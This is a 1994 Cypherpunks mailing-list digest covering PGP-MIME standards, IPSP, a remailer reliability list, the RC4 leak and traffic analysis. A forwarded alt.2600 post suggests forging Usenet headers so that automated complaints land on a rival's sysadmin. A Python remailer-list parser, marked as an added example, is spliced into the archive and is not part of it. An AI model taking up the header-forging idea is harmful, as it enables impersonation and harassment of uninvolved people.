PART 2: ANARCHIST ALTERNATIVES

DINNER at HASMIK'S Family Restaurant, 9824 National Blvd. In Cheviot Hills Center, National Exit from Santa Monica (10) Freeway. (310) 204-1591. Separate checks -- order from very reasonable menu. Beer and wine available.

PROGRAM 8 p.m. Announcements * 8:15 Featured speakers * Questions and Answers (moderated by the speaker) * Special Series Opening and Closing by SEK3 * Official Meeting Close at 10 p.m. After-meeting until...

ANARCHIST ALTERNATIVES ...and alternative anarchists.
Agorists, Discordians, anarcho-syndicalists and punks -- cypher and rock. Does "dropping out" of the hopeless aboveground political system mean less activism -- or more? Is it time to move from the back-room to the coffeehouse?
- From the conference committee room to the Usenet? Does feminism mean sharing the same oppression experienced by most males? Does voting for socialism mean bureaucratic capitalism and does voting for free enterprise mean profit...for bureaucrats? Did you vote for change last month...and get betrayed already? Are you ready to get angry...or get even? Or just get something done!

If so, come and hear our panel of real alternatives: from (De)center, IWW, and the new improved and revitalized Movement of the Libertarian Left. Find out what's already going on all around you. At Hasmik's in Cheviot Hills (West L.A.).

Make sure you are on our mailing list to get the postcard giving you the details! Call (310) 289-4126 or send your mail drop to KHC c/o AI, 291 S. La Cienega Blvd., #749, Beverly Hills, CA 90211. (Or e-mail to j.hastings6 at genie.geis.com) - JKH

Same time and place, next month:

3. Monday, January 16, 1995 "THE NIGHT OF JANUARY 16TH"

What have the Objectivists been up to since the death of Ayn Rand? Successors, institutes, new associations...some of whom are actually eager to dialog with libertarians and others. Have they something new for us to consider? Should we go back to our philosophical roots first before wasting more time on inherently impossible solutions? Is A still A? On this most special night for objectivists, come and find out.

Kent - j.hastings6 at genie.geis.com (story.com will be repaired over the next few weeks, and I'll be outahere).

-----BEGIN PGP SIGNATURE-----
Version: 2.3
-----END PGP SIGNATURE-----

From JLICQUIA at mhc.uiuc.edu Mon Dec 19 10:20:46 1994
From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI))
Date: Mon, 19 Dec 94 10:20:46 PST
Subject: PGP-MIME spec (No Flames Allowed!)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Disclaimer: This document assumes that MIME is an OK thing and a possible tool for bringing crypto to the masses. It does not assume anything about the current state of affairs concerning MIME mailers; rather, it serves as a possible impetus for code. Critical posts of a non-technical nature ("MIME sucks, you moron!") will be ignored.

Watching the MIME flame wars, I was intrigued by the references quoted concerning PEM-MIME and so on, leading me to a great deal of research with an eye to writing some PGP-MIME kinds of tools. In doing this, I happened upon a post by Mr. Borenstein in comp.mail.mime stating, in effect, that the previous draft standard of application/pgp was a dead end.

I also noticed that Mr. Borenstein called for volunteers to write a draft standard to integrate PGP into the PEM-MIME scheme developed at the last IETF meeting. This seems like a golden opportunity to give mail vendors a "push" to integrate PGP with their mailers, so I thought I'd mention it here in case someone was interested who might have missed the comp.mail.mime post. I've noticed Mr. Borenstein's presence here in cypherpunks; I invite him to clarify or update as needed.

I'd also volunteer to work on the draft, except that my qualifications to do so are about as low as you get on a list like this one, and I'm sure that just about anyone else would probably be more qualified. However, if no one else is interested, I'll do what I can!
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From bshantz at spry.com Mon Dec 19 10:25:03 1994
From: bshantz at spry.com (bshantz at spry.com)
Date: Mon, 19 Dec 94 10:25:03 PST
Subject: IPSP
Message-ID: <199412191825.KAA05231@homer.spry.com>

For the sake of a friend, I'm trying to explain the basics of IPSP. And I've choked!!! Could someone please explain it. What is it, how does it work. ETC.

-- Brad

From skaplin at skypoint.com Mon Dec 19 10:29:58 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Mon, 19 Dec 94 10:29:58 PST
Subject: Any suggestions for additions to this?
In-Reply-To: <199412191310.AA18060@ideath.goldenbear.com>
Message-ID: <0YPzkKjqRqoN075yn@skypoint.com>

-----BEGIN PGP SIGNED MESSAGE-----

> [BEGIN PGP SIGNED MESSAGE]
> To: skaplin at skypoint.com
> >All binary files are UUENCODED with PGP signatures.
>
> Hmm, what about using PGP instead of UUENCODE, if they're going
> to be signed anyway?
>

I'm working on the lowest common denominator theory. Maybe they have PGP set up...maybe they don't. If they do then they can verify the signature. If they don't they still will have uudecode on their system and can access the file. Nothing frustrates me more than trying to get a file only to find out unexpectedly I need something else to access it.

Sam

==============================================================================
Laughter is the shortest distance between two people.
- Victor Borge
==============================================================================
skaplin at skypoint.com                  | "...vidi vici veni" - Overheard
                                        | outside a Roman brothel.
PGP encrypted mail is accepted and      |
preferred.                              | Change is the only constant in the
                                        | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com   | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender
-----END PGP SIGNATURE-----

From raph at CS.Berkeley.EDU Mon Dec 19 10:30:20 1994
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 19 Dec 94 10:30:20 PST
Subject: List of reliable remailers
Message-ID: <199412191450.GAA03870@kiwi.CS.Berkeley.EDU>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.

To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"vox"} = " cpunk pgp. post";
$remailer{"avox"} = " cpunk pgp post";
$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"rebma"} = " cpunk pgp hash";
$remailer{"jpunix"} = " cpunk pgp hash latent cut post ek";
$remailer{"c2"} = " eric pgp hash";
$remailer{"soda"} = " eric post";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub";
$remailer{"usura"} = " cpunk pgp. hash latent cut post";
$remailer{"desert"} = " cpunk pgp. post";
$remailer{"nately"} = " cpunk pgp hash latent cut";
$remailer{"xs4all"} = " cpunk pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = " cpunk";
$remailer{"mix"} = " cpunk hash latent cut ek";
$remailer{"q"} = " cpunk hash latent cut ek";

catalyst at netcom.com is _not_ a remailer.

Last ping: Mon 19 Dec 94 6:00:03 PST

remailer  email address                      history        latency  uptime
-----------------------------------------------------------------------
usura     usura at replay.com                +***++*+****      7:47  99.99%
alumni    hal at alumni.caltech.edu          *+*****+****      4:24  99.99%
c2        remail at c2.org                   +++-+++++-++     41:24  99.99%
penet     anon at anon.penet.fi              *****+*+****     29:39  99.99%
nately    remailer at nately.ucsd.edu        ++++++.+++++   1:29:04  99.99%
portal    hfinney at shell.portal.com        ************      2:19  99.99%
flame     tomaz at flame.sinet.org           ***+-++**+*       8:57  99.99%
ideath    remailer at ideath.goldenbear.com  *-*++**+****     11:44  99.97%
bsu-cs    nowhere at bsu-cs.bsu.edu          -**++*******      5:59  99.96%
mix       mixmaster at nately.ucsd.edu       **+++*.+++++   1:26:32  99.96%
desert    remail at desert.xs4all.nl         .--------.--  14:21:48  99.99%
jpunix    remailer at jpunix.com             ** +-++**+*       8:35  99.78%
q         q at c2.org                        *-+--++          49:41  99.79%
vox       remail at vox.xs4all.nl            --..-----.    17:07:50  99.99%
rahul     homer at rahul.net                 ****** ****+     10:59  99.50%
soda      remailer at csua.berkeley.edu      ._........    10:05:18  99.41%
xs4all    remailer at xs4all.nl              ****+ +****       8:09  99.10%
rebma     remailer at rebma.mn.org           *---___..-.-  30:10:54  82.77%
extropia  remail at extropia.wimsey.com      -.-+           5:00:06  27.26%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

History key

* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

Options and features

cpunk
    A major class of remailers. Supports Request-Remailing-To: field.
eric
    A variant of the cpunk style. Uses Anon-Send-To: instead.
penet
    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp
    Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
oldpgp
    Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine.
hash
    Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub
    Remailer always kills subject header, even in non-pgp mode.
nsub
    Remailer always preserves subject header, even in pgp mode.
latent
    Supports Matt Ghio's Latent-Time: option.
cut
    Supports Matt Ghio's Cutmarks: option.
post
    Post to Usenet using Post-To: or Anon-Post-To: header.
special
    Accepts only pgp encrypted messages.
ek
    Encrypt responses in reply blocks using Encrypt-Key: header.

Comments and suggestions welcome!

Raph Levien

From skaplin at skypoint.com Mon Dec 19 10:30:20 1994
From: skaplin at skypoint.com (Samuel Kaplin)
Date: Mon, 19 Dec 94 10:30:20 PST
Subject: Automated Witchhunt: I've been slandered by a script.
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article , you wrote:
>
>
>
> It seems then that someone is running a process which looks for posts to
> alt.2600, and then automates the above response, original post attached,
> to warn off system admins, fight crime, save the day, etc. etc.
> Either that or Lance is bored again.

Hi Uni,

I found this in alt.revenge and it may have something to do with your problem. I didn't follow all of it, but then again I don't subscribe to alt.2600.

Sam

Path: skypoint.com!winternet.com!interactive.net!news.sprintlink.net!howland.reston.ans.net!gatech!n
From: crk_test at guiness.ucns.uga.edu (Danhiel "Deviant?" Baker)
Newsgroups: alt.2600,alt.revenge
Subject: Thanks Cracker Buster!
Date: 17 Dec 1994 17:16:24 GMT
Organization: Beyond the Mists
Lines: 27
Sender: crk_test at guiness.ucns.uga.edu
Message-ID: <3cv6d8$mos at hobbes.cc.uga.edu>
NNTP-Posting-Host: sb.dcs.uga.edu
Approved-By: Derkhil CatSpawn
Originator: dbaker at sb.dcs.uga.edu
Xref: skypoint.com alt.2600:41189 alt.revenge:4501

It's surprising to me that no one else has touched on this before; it'd seem the natural thing for those that read 2600. While the automated messages are rather annoying when you are making a "legit" post, you can use this 'service' that Cracker Buster is providing for a bit of net-revenge.

News is easy to forge - the spammer demonstrated that quite handily - and providing a new 'From:' line to a post that points to your favorite net-nemesis. Some on alt.2600 are pro'ly already doing a similar switch in order to mis-direct the autoresponses and save themself a headache. With a little thought I'm sure that you could generate quite an interesting post that will have their sysadmin suspicious quite quickly.

Just a thought... For all of his hypocritical "goods intentions", Cracker Buster has provided another method to cause all of that damage/destruction/evil/traffic stoppage that he accuses us of.

*grin* No, I wouldn't actually suggest that you mis-direct the auto-replies in a malicious way; a couple of "legit" ideas along this line would be to screw-up your 'From:' line so that Cracker Buster gets a mailbox full of returned-mail-bad-address (this I *do* suggest, naturlich!) and to add your own 'Really-From: realme at real.address.com' line with your correct address so that ppl that _really_ want to get in touch with you can. Some variation on the line would be advised -- no need to make it easy for his responder to handle. Take a look at the headers on CB's apology post for more ideas and suggestions.

Pro'ly need a "Sender:" line as well; I'll know exactly after this post goes thru.

Danhiel

==============================================================================
Doctors are just the same as lawyers; the only difference is that lawyers merely rob you, whereas doctors rob you and kill you too.
--Anton Chekhov--
==============================================================================
skaplin at skypoint.com                  | "...vidi vici veni" - Overheard
                                        | outside a Roman brothel.
PGP encrypted mail is accepted and      |
preferred.                              | Change is the only constant in the
                                        | Universe..."Four quarters, please."
E-mail key at four11.com for PGP Key or |
Finger skaplin at mirage.skypoint.com   | Smile!! Big brother is watching.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: This message digitally signed to verify the identity of the sender
-----END PGP SIGNATURE-----

From TBKLU at bebop.tt.luth.se Mon Dec 19 10:32:13 1994
From: TBKLU at bebop.tt.luth.se (Karl Lundkvist)
Date: Mon, 19 Dec 94 10:32:13 PST
Subject: Pgp in Europe
Message-ID: <1DB8505345B@bebop.tt.luth.se>

Does anyone know a way to get Pgp 2.6.2 by ftp, mail or something in Europe? All I can find that I'm allowed to download from the net is 2.3...

I suppose this is because of those silly American crypto-laws, but I've seen Europeans using the later versions, so they can't be that hard to get.

Karl Lundkvist

From ddt at lsd.com Mon Dec 19 10:32:39 1994
From: ddt at lsd.com (Dave Del Torto)
Date: Mon, 19 Dec 94 10:32:39 PST
Subject: FTP: qwerty site gone, crypto files needed
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Michael Paul Johnson and I are wondering what happened to . He's apparently dropped his Netcom account and thus the handy Crypto-related files he used to keep there are not available to the world.

If anyone has any idea of the whereabouts of Mr. Qwerty and/or his files, please contact me at and fill me in, so I can arrange to put the files back up in my FTP directory as a public service and so Mike can update his "Where to get PGP" FAQ to reflect the new site.
Thanks,

dave

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui
-----END PGP SIGNATURE-----

From scotts at uvsg.com Mon Dec 19 10:34:04 1994
From: scotts at uvsg.com (SCOTT STADELI)
Date: Mon, 19 Dec 94 10:34:04 PST
Subject: FW: The NEXUS-Berkeley Presents: a New Years Party
Message-ID: <2EF59312@smtpmail.uvsg.com>

----------
From: owner-cypherpunks
To: nexus-berkeley
Subject: The NEXUS-Berkeley Presents: a New Years Party
Date: Sunday, December 18, 1994 5:18

>around the continent. (I would include here the Australian sites but
>that would require that the party start approx. 7 AM on the 31st...)

You say that like it would be a _bad_ thing.

From jrochkin at cs.oberlin.edu Mon Dec 19 10:39:28 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 19 Dec 94 10:39:28 PST
Subject: cypherpunks mentioned in Z Magazine
Message-ID:

There was an article in Z Magazine about the RC4 disclosure, and IP and information in general on the internet, in which the cypherpunks were mentioned. They got a lot of information confused about cypherpunks, but overall it was an interesting article. Here's the first portion of the article, in which cypherpunks were given prominence. If anyone wants to write them and clear up their confusion between anonymous remailers and mailing lists, or other errors about the 'punks (which generally cast us in a worse light than we should be), their address is:

Z Magazine
18 Millfield St
Woods Hole, MA 02543

********

Pandora's Mailbox; RC4 a secret no longer
by Mark Chen

On September 9 there appeared on the Cypherpunk's Internet mailing list a short piece of computer code purporting to be RSA Data Security's secret RC4 cipher algorithm. RC4 is one of the most widely used commercial ciphers, but its internals have for years been a guarded trade secret--a status that changes within hours, as the program fragment, which simple tests revealed to be the genuine article, traversed the farthest corners of the Net via e-mail, bulletin boards, and file transfer. State Department export regulations, as well as intellectual property laws, were smoothly rendered moot. As Cypherpunks founder Tim May says, "National Borders are just speed bumps on the information superhighway."

Soon after RC4 hit the Net, RSA Data Security (RSADSI) issued a statement that read in part:

"It has come to RSA Data Security's attention that certain RSA trade secrets, in the form of confidential and proprietary source code, have been misappropriated and disclosed..."

"...Not only is this act a violation of law, but its publication is a gross abuse of the Internet. RSA has begun an investigation and will proceed with legal action against anyone found to have violated its intellectual property rights."

Setting aside the questionable legal basis of these threats, why doesn't RSADSI bring charges against the person who originally released the code? The answer is that they don't know who did it.

The code was distributed through a mechanism called a "mailing list," a system that distributes e-mail to people who have signed up to receive messages on a given topic. For example, if you were interested in fish, you might sign up for an aquarium hobbyists' list. People could then send email to the list server, and the e-mail would be forwarded to everyone on the list.

RC4 was posted to the Cypherpunks "anonymous remailers" list. When an anonymous remailer receives a message, it strips off all of the sender information and remails the message under an anonymous pseudonym. This effectively breaks the link between sender and recipients, and makes tracing impossible.

The intended purpose of these remailers is to allow free distribution of various intellectual "commodities" whose distribution is ordinarily discouraged by law or custom. A Cypherpunk faction called the Information Liberation Front has long used anonymous remailing to distribute inaccessible, expensive, copyrighted literature. Moreover, the remailers serve as technological guarantee of the right to free speech. They allow unpopular opinions to be voiced, while protecting the authors of those opinions from retribution.

Far from being a "gross abuse of the Internet," as RSADSI maintains, the distribution of RC4 was a case of the Internet doing what it does best--propagating ideas. While this act may or may not have been a violation of human-made laws, it was a faithful exercise of the natural laws of information flow...

[etc etc]

From perry at imsi.com Mon Dec 19 10:50:24 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Mon, 19 Dec 94 10:50:24 PST
Subject: PGP-MIME spec (No Flames Allowed!)
In-Reply-To:
Message-ID: <9412191850.AA07233@snark.imsi.com>

"JEFF LICQUIA (CEI)" says:
> with an eye to writing some PGP-MIME kinds of tools. In doing this, I
> happened upon a post by Mr. Borenstein in comp.mail.mime stating, in
> effect, that the previous draft standard of application/pgp was a dead
> end.

It is a dead end. Look at the current PEM/MIME drafts for the new security multiparts format. It's been accepted by the working group and is on its way to draft standard.

Perry

From perry at imsi.com Mon Dec 19 10:52:12 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Mon, 19 Dec 94 10:52:12 PST
Subject: IPSP
In-Reply-To: <199412191825.KAA05231@homer.spry.com>
Message-ID: <9412191851.AA07244@snark.imsi.com>

bshantz at spry.com says:
> For the sake of a friend, I'm trying to explain the basics of IPSP.
> And I've choked!!! Could someone please explain it. What is it,
> how does it work. ETC.

Simplified, the idea is that you put a cryptographic encapsulation around your packets and then send them inside other IP packets; the receiver unwraps them and unencrypts them.

I'll send sections of my draft if anyone wants to hear more on the topic.

Perry

From jamesd at netcom.com Mon Dec 19 11:15:02 1994
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 19 Dec 94 11:15:02 PST
Subject: (fwd) Re: Content-Type of application/pgp
Message-ID: <199412191913.LAA08602@netcom8.netcom.com>

Xref: netcom.com comp.mail.mime:5131
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!agate!library.ucla.edu!csulb.edu!paris.ics.uci.edu!ucivax!gateway
From: nsb at nsb.fv.com (Nathaniel Borenstein)
Subject: Re: Content-Type of application/pgp
Message-ID: <0iv6J0H0Eyt5I2gP0o at nsb.fv.com>
In-Reply-To: <3blaqd$fgn at wegener.ems.psu.edu>
Newsgroups: comp.mail.mime
Lines: 17
References: <3blaqd$fgn at wegener.ems.psu.edu>
Date: 12 Dec 94 15:01:06 GMT

After several discussions over the last few weeks -- with Phil Zimmerman, Jim Galvin, Ned Freed, and others at Email World and IETF -- I have reached the conclusion that the application/pgp type should be ABANDONED in favor of an approach based on multipart/security. My application/pgp Internet Draft is expiring shortly & will not be renewed.

By using multipart/security, we can work towards a greater level of harmony between the PEM and PGP communities. It also now appears that there's a chance that PEM and PGP keys can be made interoperable, which would be a huge win. I don't want anyone to think I'm standing in the way of this convergence, so I wanted to publicly state that I have abandoned my application/pgp Internet Draft.

What we need now is for someone to work up a new draft on how to use PGP inside of multipart/security. I'm swamped. Any volunteers?

-- Nathaniel

--
---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we       James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.           jamesd at netcom.com

From cactus at seabsd.hks.net Mon Dec 19 12:01:28 1994
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Mon, 19 Dec 94 12:01:28 PST
Subject: Name that phone
Message-ID: <199412192001.PAA24713@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

I like: "Pretty Good Phone". Keep the "PGP" motif.

- --
Todd Masco        | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus at hks.net | scornful tone, 'it means just what I choose it to mean -
cactus at bb.com  | neither more nor less.'" - Lewis Carroll
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From jrochkin at cs.oberlin.edu Mon Dec 19 12:04:46 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 19 Dec 94 12:04:46 PST
Subject: List of reliable remailers
Message-ID:

At 9:50 AM 12/19/94, Raph Levien wrote:
> eric
> A variant of the cpunk style. Uses Anon-Send-To: instead.

Question:
Are there in fact any remailers out there that _don't_ take Request-Remailing-To:, but only Anon-Send-To:? That is, are there in fact any "eric" remailers, according to Raph's criteria?

I've used at least one of the remailers that's labeled as "eric" on Raph's list, and used "Request-Remailing-To:" with it, and been successful. I'm wondering if this is the case for all of them.
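
Raph Levien's listing earlier in this thread is laid out to be read by a program. The following is an added example, not premail's code and not from any poster: it parses a few rows copied from that listing, maps each remailer class to the header field the list's key says it expects, and filters by uptime and latency. The function names, the thresholds, the destination address in the usage comment, and the reading of the latency column as [h:]mm:ss are assumptions.

```python
import re

# Header field each remailer class expects, per the list's "Options and features" key.
CLASS_HEADER = {
    "cpunk": "Request-Remailing-To",
    "eric": "Anon-Send-To",
    "penet": "X-Anon-To",
}

# Rows copied from the listing in this thread. The bracketed address that
# would start each capability string is absent in this archive, so the
# parser treats it as optional.
CAPS = r'''
$remailer{"c2"} = " eric pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"jpunix"} = " cpunk pgp hash latent cut post ek";
$remailer{"usura"} = " cpunk pgp. hash latent cut post";
$remailer{"penet"} = " penet post";
$remailer{"rebma"} = " cpunk pgp hash";
'''
STATS = '''
usura usura at replay.com +***++*+**** 7:47 99.99%
c2 remail at c2.org +++-+++++-++ 41:24 99.99%
penet anon at anon.penet.fi *****+*+**** 29:39 99.99%
bsu-cs nowhere at bsu-cs.bsu.edu -**++******* 5:59 99.96%
jpunix remailer at jpunix.com ** +-++**+* 8:35 99.78%
rebma remailer at rebma.mn.org *---___..-.- 30:10:54 82.77%
'''

CAP_RE = re.compile(r'\$remailer\{"([^"]+)"\}\s*=\s*"([^"]*)";')
STAT_RE = re.compile(
    r'^(\S+)\s+(\S+ at \S+|\S+@\S+)\s+(.*?)\s+((?:\d+:)?\d+:\d\d)\s+(\d+\.\d+)%$')


def parse_caps(text):
    """Return {name: {address, klass, options, pgp, short_key_id}}."""
    out = {}
    for name, value in CAP_RE.findall(text):
        address = None
        m = re.match(r'\s*<([^>]*)>', value)
        if m:                                   # optional leading <address>
            address, value = m.group(1), value[m.end():]
        tokens = value.split()
        klass = next((t for t in tokens if t in CLASS_HEADER), None)
        options = {t.rstrip(".") for t in tokens if t != klass}
        out[name] = {
            "address": address,
            "klass": klass,
            "options": options,
            "pgp": "pgp" in options,
            # "pgp." means: use the short name as the encryption key ID.
            "short_key_id": "pgp." in tokens,
        }
    return out


def to_seconds(latency):
    """Convert [h:]mm:ss to seconds (assumed meaning of the latency column)."""
    secs = 0
    for part in latency.split(":"):
        secs = secs * 60 + int(part)
    return secs


def parse_stats(text):
    """Return {name: {address, history, slow_pings, latency_s, uptime}}."""
    out = {}
    for line in text.splitlines():
        m = STAT_RE.match(line.strip())
        if not m:
            continue                            # headings, rules, blank lines
        name, address, history, latency, uptime = m.groups()
        out[name] = {
            "address": address,
            "history": history,
            # '.' = answered after more than a day, '_' = came back too late.
            "slow_pings": sum(history.count(c) for c in "._"),
            "latency_s": to_seconds(latency),
            "uptime": float(uptime),
        }
    return out


def select(caps, stats, min_uptime=99.9, max_latency_s=3600, require_pgp=True):
    """Names passing the uptime, latency and PGP filters, fastest first."""
    picks = []
    for name, st in stats.items():
        cap = caps.get(name)
        if cap is None or cap["klass"] is None:
            continue
        if require_pgp and not cap["pgp"]:
            continue
        if st["uptime"] < min_uptime or st["latency_s"] > max_latency_s:
            continue
        picks.append(name)
    return sorted(picks, key=lambda n: stats[n]["latency_s"])


def request_line(name, caps, destination):
    """Header line asking remailer `name` to forward to `destination`."""
    return f"{CLASS_HEADER[caps[name]['klass']]}: {destination}"


if __name__ == "__main__":
    caps, stats = parse_caps(CAPS), parse_stats(STATS)
    for name in select(caps, stats):
        # someone@example.org is a placeholder destination.
        print(name, "->", request_line(name, caps, "someone@example.org"))
```

The capability string records only the class a remailer was filed under; whether a given remailer also honours another class's header, as asked above, has to be tested against the remailer itself.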
From raph at CS.Berkeley.EDU Mon Dec 19 12:28:57 1994 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 19 Dec 94 12:28:57 PST Subject: List of reliable remailers In-Reply-To: Message-ID: <199412192028.MAA05164@kiwi.CS.Berkeley.EDU> Jonathan Rochkind writes: > At 9:50 AM 12/19/94, Raph Levien wrote: > > eric > > A variant of the cpunk style. Uses Anon-Send-To: instead. > > Question: > Are there in fact any remailers out there that _don't_ take > Request-Remailing-To:, but only Anon-Send-To:? That is, are there in fact > any "eric" remailers, according to Raph's criteria? > > I've used at least one of the remailers that's labled as "eric" on Raph's > list, and used "Request-Remailing-To:" with it, and been succesful. I'm > wondering if this is the case for all of them. I classified c2 as an "eric" remailer because it has normal handling of subject lines with Anon-Send-To but not with Request-Remailing-To. I think it kept the subject line even when the message was encrypted. This is a big hole for traffic analysis. Raph From lmccarth at ducie.cs.umass.edu Mon Dec 19 12:51:35 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 19 Dec 94 12:51:35 PST Subject: Pgp in Europe Message-ID: <199412192056.PAA25273@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Karl Lundkvist writes: > Does anyone know a way to get Pgp 2.6.2 by ftp, mail or something in > Europe? All I can find that I'm allowed to download from the net is > 2.3... The U.S. govt. doesn't want you to get PGP from the U.S., but you are (presumably) not a U.S. resident or citizen, so U.S. laws don't apply to you. As long as _Swedish_ law doesn't bar you from importing strong cryptography into Sweden, you can grab PGP from wherever you like. -L. 
Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvXyIWf7YYibNzjpAQGY+gP/ZxIH2glPB4RVz+kDjQj4FvxLGxTd3qMk mMbaFyMS5sfDV8tcmkSK4Ll5FWZwT2jede4JYXov/nbr8gIAjcTAvD0ejtJzyYxK FQx+nf9JUr2wViLU+6gm86ea1y7sH/wHjMNhnfwLxh50G9KenZZW+Od5Jzw/t8tR +qcaUwNGDfg= =OUBK - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvXzayoZzwIn1bdtAQGDZQGAlQQ3P9X513paHxgmDwh84u1KmNJR9aUZ 3XMHg0Jl08FELed6hI8XJUUXep1y4DK8 =MATE -----END PGP SIGNATURE----- From rishab at dxm.ernet.in Mon Dec 19 13:23:17 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Mon, 19 Dec 94 13:23:17 PST Subject: Envelopes speak - tracking information flow Message-ID: Re traffic analysis, cpunk remailers, DC-nets. Electric Dreams Weekly column for The Asian Age by Rishab Aiyer Ghosh #41, 19/December/1994: Envelopes speak - tracking information flow Digital communication is extremely vulnerable to interception, sorting and archival. Current electronic mail systems offer less privacy than open messages on postcards - at least it's impractical to keep copies of enormous quantities of paper mail. Encryption, which is slowly gaining popularity as a means of ensuring a degree of privacy of e-mail and eventually voice communication, is analogous to letters in sealed envelopes. This protects against one invasion of privacy - of communication content, or what you write and read. However there is at present little protection against a possibly more serious invasion of privacy, that of communication context, or to whom you send and from whom you receive messages. 
As such messages can include anything from New Year greetings to a friend to contract negotiations to CD purchases, there is a lot that can be known about you from addressing details on the most secure, encrypted mail - the tale the envelopes tell. Currently, whether you make a phone call or send an e- mail, your communication is routed through a host of different sites - telephone exchanges or computers around the world. It may not be technically possible for these sites to extract the content of your message because of encryption. It is not feasible, and usually illegal, for them to archive traffic. But it is very easy to archive routing information, and such logs are routinely kept by computers on the e-mail network as well as telephone exchanges. The legal process of getting access to addressing information is much simpler than for intercepting communication content itself, because it is often assumed that such information is, on its own, useless. Actually it is probably more useful than interception. Such traffic analysis helped track Iranian assassins in France earlier this year, using records of 20,000 phone calls from public booths. It could also be used for intrusive monitoring of your income or hospital visits, or for that matter to crack down on Tibetan human rights activists. Cypherpunks - the assorted citizens of cyberspace who try to protect privacy through the use of technology - may have a solution. Elated by the success of anonymous remailers - special e-mail addresses that repost messages after removing any traces of the original sender, especially favoured in discussion forums for victims of sexual abuse - they are now working on methods to reduce, if not eliminate altogether, the menace of traffic analysis. Without these, it would be possible to associate anonymous messages with their original senders by carefully matching arrival times in various system logs. Remailers and their users resort to several countermeasures. 
They collect incoming mail and repost anonymized versions in batches of random sizes, to avoid a correlation between mail arrival times. They route mail through random groups of remailers, often in different countries, to make tracing posts back to the source harder. And of course, they encrypt as much traffic as possible. Although remailers prevent reverse traffic analysis - tracking mail from the recipient to the sender - they don't protect against traffic analysis from source - tracking the output of a specific site or individual. Dining Cryptographer networks, or DC-Nets were developed almost a decade ago as a networking protocol allowing a group of people to broadcast messages, while making it impossible to identify the specific source from within the group. Unfortunately DC-Nets have not yet gone beyond the early experiments; but there is hope that they will soon silence the electronic envelopes of traffic analysis. Privacy and freedom of expression are basic human rights. Where laws and international treaties have failed to protect them, it looks increasingly likely that in a borderless world of digital signals, technology will. Rishab Aiyer Ghosh is a freelance technology consultant and writer. You can reach him through voice mail (+91 11 3760335) or e-mail (rishab at dxm.ernet.in). --====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====-- This article may be redistributed in electronic form only, PROVIDED THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form, or redistributed in any form for compensation of any kind, WITHOUT PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab at 